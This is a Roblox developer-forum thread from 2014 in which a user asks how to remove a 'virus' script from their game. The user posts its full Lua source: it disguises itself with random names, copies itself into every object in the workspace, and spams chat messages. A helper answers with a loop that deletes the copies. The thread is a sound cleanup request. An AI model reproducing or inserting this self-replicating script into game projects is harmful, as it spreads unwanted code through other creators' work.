generic image
Processing...
  • Games
  • Catalog
  • Develop
  • Robux
  • Search in Players
  • Search in Games
  • Search in Catalog
  • Search in Groups
  • Search in Library
  • Log In
  • Sign Up
  • Games
  • Catalog
  • Develop
  • Robux
   
ROBLOX Forum » Game Creation and Development » Scripting Helpers
Home Search
 

Virus Help please?

Previous Thread :: Next Thread 
Coopertow is not online. Coopertow
Joined: 18 Apr 2012
Total Posts: 1959
26 May 2014 07:33 PM
Whats a script to get rid of this

names={"beastlywin123","washmon13","xninjawarriorx","aleco","","","","",""}
local NameCheck = false
script.Parent.Name = names[math.random(1, #names)]
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
local c = script.Parent:Clone()

function addEvent(ch)
wait(math.random())
NameCheck = false
for ss = 1, #names do
if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
NameCheck = true
end
end
if NameCheck == false then
local cloak = c:Clone()
cloak.Name = ""
cloak:GetChildren()[1].Name = ""
cloak.Parent = ch
cloak.Name = names[math.random(1, 5)]
end
end

workspace.ChildAdded:connect(addEvent)

game.Players.PlayerAdded:connect(function(pl)
pl.Chatted:connect(function(m)
if m:sub(1, 5) == "/sc t" then
local m = Instance.new("Message")
m.Parent = workspace
m.Text = "BadWordDeleted"
wait(1)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "BadWordDeleted"
wait(1)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "lOoOoOoOp"
wait(0.25)
m.Text = "LoOoOoOoP"
wait(0.25)
m.Text = "BadWordDeleted"
wait(3)
m:remove()
end
if m:sub(1, 5) == "BadWordDeleted" then
local m = Instance.new("Message")
m.Parent = workspace
m.Text = "BadWordDeleted"
wait(3)
m:remove()
end
end)
end)

while true do
local s = workspace:GetChildren()
for i = 1, #s do
NameCheck = false
for ss = 1, #names do
if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
NameCheck = true
end
end
if NameCheck == false then
local cloak = c:Clone()
cloak.Name = ""
cloak:GetChildren()[1].Name = ""
cloak.Parent = s[i]
end
wait(0.1)
end
wait(1)
end

If theres bad words still there (I tryed my best to remove them all)
This isnt my script at all anyone have an idea to get rid of it?
Report Abuse
twerq is not online. twerq
Joined: 08 Jun 2013
Total Posts: 1057
26 May 2014 07:35 PM
[ Content Deleted ]
Report Abuse
Coopertow is not online. Coopertow
Joined: 18 Apr 2012
Total Posts: 1959
26 May 2014 07:38 PM
i CANT it spreaded throught the whole game every model
Report Abuse
Coopertow is not online. Coopertow
Joined: 18 Apr 2012
Total Posts: 1959
26 May 2014 07:44 PM
Pls help
Report Abuse
cntkillme is not online. cntkillme
Joined: 07 Apr 2008
Total Posts: 44956
26 May 2014 07:45 PM
What is the name of the script
Report Abuse
Coopertow is not online. Coopertow
Joined: 18 Apr 2012
Total Posts: 1959
26 May 2014 07:50 PM
It wasnt a script it was a like HumanColor thingy like in your character in studio

and the names are either just a space or names= beastlywin123 washmon13 xninjawarriorx aleco
Report Abuse
Coopertow is not online. Coopertow
Joined: 18 Apr 2012
Total Posts: 1959
26 May 2014 07:52 PM
The script name is ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere
Report Abuse
cntkillme is not online. cntkillme
Joined: 07 Apr 2008
Total Posts: 44956
26 May 2014 08:31 PM
then just do a loop to remove all of them in studio.

while workspace:FindFirstChild("ProperGråmmerNeededInPhilosiphalLocations", true) do workspace:FindFirstChild("ProperGråmmerNeededInPhilosiphalLocations", true):Destroy() end
while workspace:FindFirstChild("insertNoobHere", true) do workspace:FindFirstChild("insertNoobHere", true):Destroy() end

In the command bar
Report Abuse
Previous Thread :: Next Thread 
Page 1 of 1
 
 
ROBLOX Forum » Game Creation and Development » Scripting Helpers
   
 
   
  • About Us
  • Jobs
  • Blog
  • Parents
  • Help
  • Terms
  • Privacy

©2017 Roblox Corporation. Roblox, the Roblox logo, Robux, Bloxy, and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.



Progress
Starting Roblox...
Connecting to Players...
R R

Roblox is now loading. Get ready to play!

R R

You're moments away from getting into the game!

Click here for help

Check Remember my choice and click Launch Application in the dialog box above to join games faster in the future!

Gameplay sponsored by:
Loading 0% - Starting game...
Get more with Builders Club! Join Builders Club
Choose Your Avatar
I have an account
generic image